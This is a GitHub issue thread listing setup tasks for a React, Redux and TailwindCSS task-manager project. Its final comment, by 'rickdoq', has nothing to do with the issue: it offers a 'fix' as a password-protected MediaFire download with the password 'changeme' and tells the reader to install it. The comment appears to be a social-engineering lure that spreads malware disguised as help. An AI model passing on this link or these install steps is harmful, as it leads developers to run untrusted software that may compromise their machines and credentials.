### ISSUE TITLE
Project Structure Setup (Group Task) - **[2H]**

### ISSUE THREAD

**Issue by ahzamir** [ahzamir/task-manager#2]
3. **Create Project Structure** - **[1H]**

   - **Description:** Set up the folder structure for the project, including directories for components, Redux store, and pages.

4. **Configure TailwindCSS** - **[1H]**
   - **Description:** Initialize TailwindCSS and configure it in the project. Update the `tailwind.config.js` file and include Tailwind directives in `index.css`.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
